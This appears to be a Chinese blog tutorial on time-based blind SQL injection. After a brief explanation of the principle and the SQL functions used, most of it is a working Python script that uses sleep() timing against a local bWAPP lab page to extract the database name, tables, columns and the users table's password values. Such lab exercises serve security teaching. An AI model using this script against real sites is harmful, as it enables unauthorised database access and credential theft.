Web安全(二)SQL注入[三]
时间盲注
原理
select * from user where id= ‘ ?’
?用户输入,替代为 4’ and sleep(3) -- ‘
实际上执行的SQL语句:
select * from user where id= ‘4’ and sleep(3) -- ‘’
当id=4存在时,休眠3秒
当id=4不存在时,直接返回整条拼接出来的SQL是正确的就执行最后的sleep,前面错误(不存在),sleep(3)不执行。
常用函数
substr(a,b,c):从b位置开始,截取字符串a的c长度
count():计算总数
ascii():返回字符的ASCII码
length():返回字符串的长度
left(a,b):从左往右截取字符串a的前b个字符
sleep(n):将程序暂停n秒
示例
选择时间盲注
正常输入可看到返回时间为1秒左右,拼接sleep函数看到时间变化了说明存在时间盲注,and前面必须是数据库里的,否则不会执行后面的and后面的命令。
python脚本
import requests
from urllib.parse import quote
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0',
'Referer': 'http://127.0.0.1/bwapp/bwapp/sqli_15.php',
'Cookie': 'security_level=0; PHPSESSID=hlk1q0q4m2qn6d8rtnhcs0gr65'
}
def guset_db_len():
len_of_db = 0
print('猜解数据库长度')
for i in range(1, 6):
url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
title = '''Man of Steel' and if(length(database())=%s,sleep(3),1)#''' % i
title = quote(title)
url = url + title
r = requests.get(url, headers=headers)
# r.elapsed.seconds计算的是从发送请求到服务端响应回来这段时间(也就是时间差),
# 发送第一个数据到收到最后一个数据之间
if (r.elapsed.seconds > 2.5):
print('length of database:', i)
len_of_db = i
continue
return len_of_db
def guest_db_name(len_of_db):
name_db = ''
char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
print('猜解数据库名称')
for i in range(1, len_of_db + 1):
for k in char_list:
k1 = ord(k)
url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
title = '''Man of Steel' and if(ascii(mid(database(),%s,1))=%s,sleep(5),1)#''' % (i, ord(k))
url = url + quote(title)
r = requests.get(url, headers=headers)
if (r.elapsed.seconds > 4.5):
name_db = name_db + k
print('第%s位:%s' % (i, k))
print('name of database:', name_db)
def guest_table_name_len():
len_of_tables = 0
char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,'
tables_name = ''
print('表长度的总和')
for i in range(2, 40):
url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
title = '''Man of Steel' and if((select length(group_concat(table_name)) from information_schema.tables where table_schema='bWAPP')=%s,sleep(5),1)#''' % i
title = quote(title)
url = url + title
r = requests.get(url, headers=headers)
# r.elapsed.seconds计算的是从发送请求到服务端响应回来这段时间(也就是时间差),
# 发送第一个数据到收到最后一个数据之间
if (r.elapsed.seconds > 4.5):
print('length of tables:', i)
len_of_tables = i
continue
print('猜解数据库名称')
for i in range(1, len_of_tables + 1):
for k in char_list:
k1 = ord(k)
url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
title = '''Man of Steel' and if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'),%s,1))=%s,sleep(5),1)#''' % (
i, k1)
title = quote(title)
url = url + title
r = requests.get(url, headers=headers)
if (r.elapsed.seconds > 4.5):
tables_name = tables_name + k
print('第%s位:%s' % (i, k))
print('name of tables:', tables_name)
def guest_name_columns():
len_of_columns = 0
char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,'
columns_name = ''
print('列长度的总和')
for i in range(2, 200):
url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
title = '''Man of Steel' and if((select length(group_concat(column_name)) from information_schema.columns where table_name='users')=%s,sleep(5),1)#''' % i
title = quote(title)
url = url + title
r = requests.get(url, headers=headers)
# r.elapsed.seconds计算的是从发送请求到服务端响应回来这段时间(也就是时间差),
# 发送第一个数据到收到最后一个数据之间
if (r.elapsed.seconds > 4.5):
print('length of columns:', i)
len_of_columns = i
continue
print('猜解列名称')
for i in range(1, len_of_columns + 1):
for k in char_list:
k1 = ord(k)
url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
title = '''Man of Steel' and if(ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='users'),%s,1))=%s,sleep(5),1)#''' % (
i, k1)
title = quote(title)
url = url + title
r = requests.get(url, headers=headers)
if (r.elapsed.seconds > 4.5):
columns_name = columns_name + k
print('第%s位:%s' % (i, k))
print('name of columns:', columns_name)
def guest_columns_content():
len_columns_content = 0
char_list = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,1234567890'
columns_content = ''
columns_name = 'password'
print('列内容长度的总和')
for i in range(2, 400):
url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
title = '''Man of Steel' and if((select length(group_concat(%s)) from users)=%s,sleep(5),1)#''' % (
columns_name, i)
title = quote(title)
url = url + title
r = requests.get(url, headers=headers)
# r.elapsed.seconds计算的是从发送请求到服务端响应回来这段时间(也就是时间差),
# 发送第一个数据到收到最后一个数据之间
if (r.elapsed.seconds > 4.5):
print('length of columns content:', i)
len_columns_content = i
continue
print('列的内容')
for i in range(1, len_columns_content + 1):
for k in char_list:
k1 = ord(k)
url = 'http://127.0.0.1/bwapp/bwapp/sqli_15.php?title='
title = '''Man of Steel' and if(ascii(mid((select group_concat(%s) from users),%s,1))=%s,sleep(5),1)#''' % (
columns_name, i, k1)
title = quote(title)
url = url + title
r = requests.get(url, headers=headers)
if (r.elapsed.seconds > 4.5):
columns_content = columns_content + k
print('第%s位:%s' % (i, k))
print('columns_content:', columns_content)
if __name__ == '__main__':
guest_db_name(5)
guest_table_name_len()
guest_name_columns()
guest_columns_content()
参考:CSDN——Gond19
- End -
觉得不错,请点个在看